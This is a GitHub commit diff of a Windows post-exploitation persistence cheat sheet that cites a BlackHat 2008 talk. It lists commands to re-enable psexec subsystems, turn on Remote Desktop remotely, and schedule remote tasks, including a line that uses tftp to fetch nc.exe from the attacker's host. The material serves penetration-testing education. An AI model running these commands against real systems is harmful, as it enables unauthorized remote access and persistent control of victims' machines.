You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: persistence/windows/general.md
+10-7Lines changed: 10 additions & 7 deletions
Original file line number
Diff line number
Diff line change
@@ -17,14 +17,15 @@ Commands to run to maintain persistence after you have exploited it and are usua
17
17
### Enable `psexec`
18
18
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
19
19
20
-
``c:\> net use \\[TargetIP]\ipc$ username /user:password
20
+
<pre>
21
+
c:\> net use \\[TargetIP]\ipc$ username /user:password
21
22
c:\> sc \\[TargetIP] config netdde start= auto
22
23
c:\> sc \\[TargetIP] config netddedsdm start= auto
23
24
c:\> sc \\[TargetIP] config clipsrv start= auto
24
25
c:\> sc \\[TargetIP] start netdde
25
26
c:\> sc \\[TargetIP] start netddedsdm
26
27
c:\> sc \\[TargetIP] start clipsrv
27
-
``
28
+
</pre>
28
29
29
30
### Enable Remote Desktop
30
31
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
@@ -57,20 +58,22 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
57
58
58
59
1. On the remote system, execute the following commands:
59
60
60
-
``c:\> sc config termservice start= auto sc config termservice start= auto
61
+
<pre>c:\> sc config termservice start= auto sc config termservice start= auto
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
72
+
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
71
73
72
-
``c:\> net use \\[TargetIP]\ipc$ password /user:username
74
+
<pre>
75
+
c:\> net use \\[TargetIP]\ipc$ password /user:username
73
76
c:\> at \\[TargetIP] 12:00 pm command
74
-
``
77
+
</pre>
75
78
76
79
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
0 commit comments